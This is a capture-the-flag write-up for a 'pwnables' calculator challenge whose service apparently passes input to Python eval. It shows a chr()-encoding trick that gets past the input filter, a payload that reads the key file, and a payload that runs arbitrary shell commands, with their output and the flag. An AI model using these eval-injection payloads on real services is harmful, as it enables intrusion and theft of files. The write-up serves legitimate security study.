Category: pwnables
AED’s summer internship program is notorious for attracting terrible programmers.
They’ve resorted to giving them some of the simplest projects to work on.
We expect this service that the latest ‘All-Star’ intern worked on all summer is no where near secure.
nc a9.amalgamated.biz 60124
Summary: python eval with some filtering
First, I tried many things to inject in input, like ; ' " `, etc. But it failed. Eventually, I tried logical operations:
Calculating: 0 or 10
Equals: 10
Then, it’s easy to guess that it maybe eval. Let’s check:
Calculating: chr(0x41)
Equals: A
Ok. We can encode any strings with chr(). We can simply read the key:
>>> def encode(s): ... return "chr(" + ")+chr(".join(map(str, map(ord, s))) + ")" ... >>> encode("/home/calculator/key") 'chr(47)+chr(104)+chr(111)+chr(109)+chr(101)+chr(47)+chr(99)+chr(97)+ chr(108)+chr(99)+chr(117)+chr(108)+chr(97)+chr(116)+chr(111)+chr(114)+ chr(47)+chr(107)+chr(101)+chr(121)'
Calculating: list(open(chr(47)+chr(104)+chr(111)+chr(109)+chr(101)+chr(47)+chr(99)+chr(97)+chr(108)+chr(99)+chr(117)+chr(108)+chr(97)+chr(116)+chr(111)+chr(114)+chr(47)+chr(107)+chr(101)+chr(121)))
Equals: ['Y0_dawg,_I_he4rd_you_l1ke_EvA1\n']
Notice: list(open(…)) is equal to open(…).readlines()
Or you can run arbitrary commands:
>>> encode("__import__('os').system('id')") 'chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+ chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+ chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+ chr(40)+chr(39)+chr(105)+chr(100)+chr(39)+chr(41)'
Calculating: eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(105)+chr(100)+chr(39)+chr(41))
uid=1006(calculator) gid=1007(calculator) groups=1007(calculator)
The flag: Y0_dawg,_I_he4rd_you_l1ke_EvA1
PS: you can download source here
